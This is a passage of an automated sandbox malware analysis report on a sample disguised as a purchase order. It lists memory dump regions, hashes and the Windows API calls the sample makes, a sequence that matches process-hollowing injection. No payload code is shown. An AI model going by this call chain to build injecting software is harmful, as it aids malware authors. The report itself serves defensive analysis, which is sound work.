VirtualProtect 60607->60609 60610 5e214a0 VirtualProtect 60607->60610 60608->60603 60609->60607 60610->60607 60613 5e22f48 60611->60613 60612 5e22fdc 60612->60603 60613->60612 60614 5e214a0 VirtualProtect 60613->60614 60615 5e21498 VirtualProtect 60613->60615 60614->60613 60615->60613 60149 5e381e8 60150 5e381e9 60149->60150 60153 5e38374 60150->60153 60155 5e3837a 60153->60155 60154 5e38497 60155->60154 60156 5e214a0 VirtualProtect 60155->60156 60157 5e21498 VirtualProtect 60155->60157 60156->60155 60157->60155 60580 5e3fca8 60581 5e3fca9 NtProtectVirtualMemory 60580->60581 60583 5e3fd6f 60581->60583 60597 5eee6b0 60598 5eee6f4 VirtualAlloc 60597->60598 60600 5eee761 60598->60600
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 380d269d74af94cb35148d27bd23bb4321c76b4731418c42a26c069dd284b66b
                                              • Instruction ID: 0bf90b586c8eda43a0eaafac576630792583103fe759735bad4a1a1132ddf945
                                              • Opcode Fuzzy Hash: 380d269d74af94cb35148d27bd23bb4321c76b4731418c42a26c069dd284b66b
                                              • Instruction Fuzzy Hash: 25B20834A002188FDB18DF95D894BADBBB6BF88701F1489D9E506AB3A4DB71DD81CF50

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8
                                              • API String ID: 0-4194326291
                                              • Opcode ID: fac869b7eeb0eb7086bee100fdacf5a73545446fc4f507eb1f1acca4e83f64a1
                                              • Instruction ID: 8bece22605c960e055038e23458fe891ced9eb733f35c6b7e79b8df4aec3a061
                                              • Opcode Fuzzy Hash: fac869b7eeb0eb7086bee100fdacf5a73545446fc4f507eb1f1acca4e83f64a1
                                              • Instruction Fuzzy Hash: E242B275D00629CBDB64DF69CC54AD9B7B2BF89300F1486EAD44DA7250EB31AE81CF90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: 7b878c9856f2dd4dcf393e983c8eea51bd802445510f47a1f70c703c16e1f99d
                                              • Instruction ID: c1bcd3270d0e618b39a21760f813466a32b952c0f7466ddac5e5c205cc5f3759
                                              • Opcode Fuzzy Hash: 7b878c9856f2dd4dcf393e983c8eea51bd802445510f47a1f70c703c16e1f99d
                                              • Instruction Fuzzy Hash: 5D220B34A00214CFDB28DFA5D994BADBBB2BF48701F1485E9E509AB3A4DB719D81CF50

                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05E3FD5D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: e67d9191e630e5af24dcffa37800fb7977b6d09d004c9c9d7d581ab94dd9169c
                                              • Instruction ID: 11eac29faefeefe082960b193315611085e867bc71e692fddba144a6fcc318e6
                                              • Opcode Fuzzy Hash: e67d9191e630e5af24dcffa37800fb7977b6d09d004c9c9d7d581ab94dd9169c
                                              • Instruction Fuzzy Hash: 24419AB4D00258DFDF10CFAAD985ADEFBB1BB49310F14A42AE829B7210D735A905CF54
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05E3FD5D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: 10b8b3f85cacffa90e5387da320f2cc77a6e255f588284341c4101422fc7285d
                                              • Instruction ID: cbdd4e996acc4da344f3c63e1085d4309b2f7194f668923ce338c9300152bbbf
                                              • Opcode Fuzzy Hash: 10b8b3f85cacffa90e5387da320f2cc77a6e255f588284341c4101422fc7285d
                                              • Instruction Fuzzy Hash: F24199B4D00258DFCF10CFAAD985ADEFBB1BB49310F14A42AE819B7210D735A905CF54
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 05E21256
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 9865b973d195be4ff3b48963e3f9dc44dff6cc23b9fb58bfc19d015a9ddc2071
                                              • Instruction ID: 3aa70d9c2c0b40b3194814f038a953ee1e83cb959c880783ff407029196bd0b6
                                              • Opcode Fuzzy Hash: 9865b973d195be4ff3b48963e3f9dc44dff6cc23b9fb58bfc19d015a9ddc2071
                                              • Instruction Fuzzy Hash: C731DBB5D00228DFDB14CFAAD880A9EFBF1BB49310F10942AE815B7304D735AA05CF94
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 05E21256
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 36a6204cb83074e767e7e827e46fae64e8c951fbd1056c97b4b52cc23027508c
                                              • Instruction ID: 6772fa22b0044fbc541d149a1bc2daf999d77d3f2a163350b8f116c44ee0381e
                                              • Opcode Fuzzy Hash: 36a6204cb83074e767e7e827e46fae64e8c951fbd1056c97b4b52cc23027508c
                                              • Instruction Fuzzy Hash: 0031C9B5D01218DFCB14CFAAD980A9EFBF1BB49310F10942AE819B7300C775A902CF94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .z
                                              • API String ID: 0-3598656969
                                              • Opcode ID: e6c2d838f3efb823a8d2dc9674d4be70838ec1b3cf66a3b4a27198adabf744a8
                                              • Instruction ID: 74ecde272a6e231873016c117822eb863f6043af75c473cb78bc818da1b18858
                                              • Opcode Fuzzy Hash: e6c2d838f3efb823a8d2dc9674d4be70838ec1b3cf66a3b4a27198adabf744a8
                                              • Instruction Fuzzy Hash: 99B1C670E05618DFDF18DFAAD888BADBBF2BF4A300F1094A9D409A7255EB745985CF10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h
                                              • API String ID: 0-2439710439
                                              • Opcode ID: f00f08943a0bb57dec6082ca2cc59ac00d40df8e70341886265bfa7e16ff5e1e
                                              • Instruction ID: 9628bdae4c9ad95123c347a30833285b052c5505319eda3c00c98f6fabe939ca
                                              • Opcode Fuzzy Hash: f00f08943a0bb57dec6082ca2cc59ac00d40df8e70341886265bfa7e16ff5e1e
                                              • Instruction Fuzzy Hash: 2661C371D006298BEB64DF6ACC54BD9B7B2BF89300F14C2AAC44DB7254EB306A85CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9dae9d4adfda6ab6bafb27dcc55760afc170f5383456984fc194d0d2266113e0
                                              • Instruction ID: df6bd6431dfbb3537a85bbfaf263cad28f2e0a3f8dadc07facf905ca490aefaf
                                              • Opcode Fuzzy Hash: 9dae9d4adfda6ab6bafb27dcc55760afc170f5383456984fc194d0d2266113e0
                                              • Instruction Fuzzy Hash: 51812574E05218CFDB54DFA9D484BEDBBF2BB49304F20A4A9D059A7358EB385886CF10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 293923292d49349c9980b24c9fc816c6b5e8f46446d1a16198178d3fc06aef40
                                              • Instruction ID: 9783c77e55f78a813cdf6ced2c369ca21c70bcad7db783c97984336d1bd7abdd
                                              • Opcode Fuzzy Hash: 293923292d49349c9980b24c9fc816c6b5e8f46446d1a16198178d3fc06aef40
                                              • Instruction Fuzzy Hash: 9A71C270D05218DFEB14CFAAC849BDDBBF2BB89304F0091AAD499AB355E7745989CF10
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486212936.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e30000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5d65ea9cbb171946e125e2db431986d8932406260b9ff53b9e7f87f456a1e6b
                                              • Instruction ID: bbfe7ab899df50def7c515f6234fcefa4d77397725015a7c7a822a1416704357
                                              • Opcode Fuzzy Hash: d5d65ea9cbb171946e125e2db431986d8932406260b9ff53b9e7f87f456a1e6b
                                              • Instruction Fuzzy Hash: AE61C570D05218DFEB14CFAAC849BDDBBF2BB89304F0491A9D499AB254E7744989CF41

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $B
                                              • API String ID: 0-2922798824
                                              • Opcode ID: 2286420e928ea4066e96cc7f60c531e869b28c58ecd38f3502d331022b6e23fd
                                              • Instruction ID: c412f5b5d604d2b29961e3fff9a4175ee8bfd0c38a7de17681b1b038bb89802b
                                              • Opcode Fuzzy Hash: 2286420e928ea4066e96cc7f60c531e869b28c58ecd38f3502d331022b6e23fd
                                              • Instruction Fuzzy Hash: 5E11B270D1525ACFDF25DF64C98DBECBAB1FB09315F1818AAC40972240C7794A95CF14

                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05E2079F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 458a91d72d51c60c656b5bcbd99dd23f09ecf3f4e8f8801aaab7436ee03d0946
                                              • Instruction ID: ac91270565b1e467c065cf43ec9b00e5f19d70b00516ae8e84f541f838fe22fd
                                              • Opcode Fuzzy Hash: 458a91d72d51c60c656b5bcbd99dd23f09ecf3f4e8f8801aaab7436ee03d0946
                                              • Instruction Fuzzy Hash: C9A11871D00228DFDF14CFA9C8497EEBBF1BB49304F14A169E899A7284DB748985CF85

                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05E2079F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 2bdf16fcc0c5d527b16c37b27a64080a8a149651362df352045a885288e0920a
                                              • Instruction ID: 5360bfc2205ac6a85e2c87b4f975b23d7d7759c35b851f448d0b47b2eab9bf81
                                              • Opcode Fuzzy Hash: 2bdf16fcc0c5d527b16c37b27a64080a8a149651362df352045a885288e0920a
                                              • Instruction Fuzzy Hash: EBA10771D00228CFDF14CFA9C8497EEBBF1BB49314F14A169E899A7284DB748985CF85

                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05E21083
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 8a3be08eb3ad70cfb67001a7a356a5efb34cb13c8f18811e4a67b0f251e4df43
                                              • Instruction ID: 100f824358fcd6ca728a4166f0233c26dcb550d8385f84c45560ccc72b5ca6e4
                                              • Opcode Fuzzy Hash: 8a3be08eb3ad70cfb67001a7a356a5efb34cb13c8f18811e4a67b0f251e4df43
                                              • Instruction Fuzzy Hash: 8241A8B4D01258DFDF14CFAAD984AEEBBF1BB49310F14902AE859B7200D375AA45CB54

                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05E21083
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 125773d0182c478011388be6e9f95485aeb3895c89efc3c4fc82cf318a225044
                                              • Instruction ID: 2d8b0a78126d9ebc8d53abfded2a4e78e6f3468efb60271f749c41decf099a75
                                              • Opcode Fuzzy Hash: 125773d0182c478011388be6e9f95485aeb3895c89efc3c4fc82cf318a225044
                                              • Instruction Fuzzy Hash: FF41A8B4D012589FDB04CFAAD984AEEFBF1BB49310F14902AE819B7200D775AA41CB64
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 60d0635ccaf66d09396235b2caadc209fd14859b0528680dbe5b5316db0b67cf
                                              • Instruction ID: 547a7c7b11478eceefb0d214a4f16e29e578aa7f6eb7851a0c2016a0826a310b
                                              • Opcode Fuzzy Hash: 60d0635ccaf66d09396235b2caadc209fd14859b0528680dbe5b5316db0b67cf
                                              • Instruction Fuzzy Hash: 15E16935600605CFCB14CF69C484A6ABBF2FFC9710B1989ADD85A8B7A1DB30F945CB94
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05E20EFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 97f30efe88a83091981d69386b626c31edf92f13b90b0cec704060b579ba2f70
                                              • Instruction ID: 8ff5328193c4de837d2b89ff725c0c87ed4202ae5a079f1e167459788d0b2c2c
                                              • Opcode Fuzzy Hash: 97f30efe88a83091981d69386b626c31edf92f13b90b0cec704060b579ba2f70
                                              • Instruction Fuzzy Hash: 9A31A6B8D04258DFDF10CFA9D985A9EFBB1BB49310F14A02AE815B7250D735A902CF68
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05E21544
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 5a8ca28111cb5795fd0e997e73c849a618052093f81cc4a96b98de63c6a1bb55
                                              • Instruction ID: f09a23deffbde64114e9cf2e245751f9cd02165a93f57220d55c9d6f229714bd
                                              • Opcode Fuzzy Hash: 5a8ca28111cb5795fd0e997e73c849a618052093f81cc4a96b98de63c6a1bb55
                                              • Instruction Fuzzy Hash: 5C31E8B4C00258DFDF14CFAAD980AEEFBB0BB49310F14942AE855B7210D735AA45CF94
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05E20EFA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: eef79151a6005b7b9a268baeb89b006e131df2bb5994db30fa21b05ff64fa362
                                              • Instruction ID: 45fa2e64bcda38a93a7824ff6af7c08f2a05bd003ea24cb460547a83f60cc40c
                                              • Opcode Fuzzy Hash: eef79151a6005b7b9a268baeb89b006e131df2bb5994db30fa21b05ff64fa362
                                              • Instruction Fuzzy Hash: 5731A8B8D04258DFDF10CFA9D984ADEFBB1BB49310F14A42AE815B7250D735A902CF54
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05E21544
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 480558b015442911654f0cde54935950dd0b1a68af7f955fdfc8c24b7a8badb9
                                              • Instruction ID: 608ec7443bb9372c1148f682f2032218f08e7c0343f0c57dbbcfd72d981f3d7d
                                              • Opcode Fuzzy Hash: 480558b015442911654f0cde54935950dd0b1a68af7f955fdfc8c24b7a8badb9
                                              • Instruction Fuzzy Hash: 0C31B8B5D00258DFCB14CFAAD980AEEFBF1BB49310F14942AE855B7210D735AA45CF94
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 05EED58C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486576798.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ee0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 53cc0688e130ae44ce31d8283d69d81970159403aa98bcd51b332625eb68a4ca
                                              • Instruction ID: d0a89e828ff0de37a061b55f2c67036d6e309633d8e3428d595169801cf2f59d
                                              • Opcode Fuzzy Hash: 53cc0688e130ae44ce31d8283d69d81970159403aa98bcd51b332625eb68a4ca
                                              • Instruction Fuzzy Hash: 3931A8B4D00248DFDB10CFA9D980A9EFBB1BB49310F14942AE815B7210D735A9468F54
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 05E2099F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: d9784e87761d82ba9f3493244b4b99625e851ee59c6b3e793bbbb73c0f27bf21
                                              • Instruction ID: 9282f60eaa75b679e9d97f0dcada367536cf4f4e2a3d99b6ea832540cb2163d4
                                              • Opcode Fuzzy Hash: d9784e87761d82ba9f3493244b4b99625e851ee59c6b3e793bbbb73c0f27bf21
                                              • Instruction Fuzzy Hash: 3641DBB4D00258DFDB10CFAAD885AEEFBF1BB88310F14902AE459B7240C738A945CF54
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 05E2099F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486156996.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e20000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 23b16496a8ee6cd5162a271a321c141a009860e9fb1b7d30af5056b5b919cd33
                                              • Instruction ID: e2d5c61735ffade1b50d91d4cc0d6f4d543647076ba1f5f261fdbb7febb966a2
                                              • Opcode Fuzzy Hash: 23b16496a8ee6cd5162a271a321c141a009860e9fb1b7d30af5056b5b919cd33
                                              • Instruction Fuzzy Hash: B831BBB4D00258DFDB10CFAAD884AEEFBF1BB89314F14902AE459B7240D779A945CF54
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RAb
                                              • API String ID: 0-2248548345
                                              • Opcode ID: 1acf4afdd0ce8c5585041175ddc65149ba0c4a25d2306e96b9a87ead5e5a980b
                                              • Instruction ID: ce033b28df9123dbefd87cdd9bf460bc236f106af3a5dc7c7d204a7b6e4d6f73
                                              • Opcode Fuzzy Hash: 1acf4afdd0ce8c5585041175ddc65149ba0c4a25d2306e96b9a87ead5e5a980b
                                              • Instruction Fuzzy Hash: 2551C274D01208DFDB18DFAAD548AADBBF2FF89300F20946AD816AB364DB359945CF50
                                              APIs
                                              • VirtualAlloc.KERNEL32(?,?,?,?), ref: 05EEE74F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486576798.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ee0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 354bdc91592743c25b50e2e03eb2e65ad46b80017032f6d2b8b912bde47ed1eb
                                              • Instruction ID: 1decf6dc8d31312241052a918251f10d2a4d3756c49618750701e2684ee30b11
                                              • Opcode Fuzzy Hash: 354bdc91592743c25b50e2e03eb2e65ad46b80017032f6d2b8b912bde47ed1eb
                                              • Instruction Fuzzy Hash: 51413D38B04709CFD714DBA9D895F6ABBF2FB85700F1488ADE8469B294DB35D841CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 845fcd15775186fe03790575f4f7fb864f1a0857763c69efe061fd89076bccaf
                                              • Instruction ID: ec2199855271d6d71fdd5aeaeec0d6f8c13d866e71ef20a9d0f8856a743e09ca
                                              • Opcode Fuzzy Hash: 845fcd15775186fe03790575f4f7fb864f1a0857763c69efe061fd89076bccaf
                                              • Instruction Fuzzy Hash: C241F374D41208EFCB04EFA6D488AEDBBB2FF89301F10946AE915A7354DB346945CF51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f40d3cdedfb485dfb9133d244d1744e23aba83f0ca4494108d2ed21cbfd17288
                                              • Instruction ID: 069c62c770b66751fdbe8d243a01da5ffe7a3750e2903a86977cdaf7a4039857
                                              • Opcode Fuzzy Hash: f40d3cdedfb485dfb9133d244d1744e23aba83f0ca4494108d2ed21cbfd17288
                                              • Instruction Fuzzy Hash: AF3150713006109FD308DB69D5A9F2A77E6AFC8714F1044A8E606CB3A1DF71EC42C795
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46eb787bd058d4a09f33e10800e6c625df1b4cc00b0d9c12d4929823d05d1740
                                              • Instruction ID: 8444f56199d9b6fe24eff220ccf56b91e1b915d7070ed4b23792b9444a988fd0
                                              • Opcode Fuzzy Hash: 46eb787bd058d4a09f33e10800e6c625df1b4cc00b0d9c12d4929823d05d1740
                                              • Instruction Fuzzy Hash: 1D31F536610104AFCB05DF59D998EA9BBB2FF48324B1640B8F60A9B372C771ED55DB40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e03f49e58df111c557b2874b95a47b86a2f8d6ed53fd0c2d22a5b6b9616357a8
                                              • Instruction ID: 22bcba448a328118eea7ce0f3b9bf90e43e13edd5217377e9b48b4c294f846d3
                                              • Opcode Fuzzy Hash: e03f49e58df111c557b2874b95a47b86a2f8d6ed53fd0c2d22a5b6b9616357a8
                                              • Instruction Fuzzy Hash: 54415E34A44245CFD704EF58C484BA9B7B2FB46312F1486B5D915AB7AADB34EC41CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
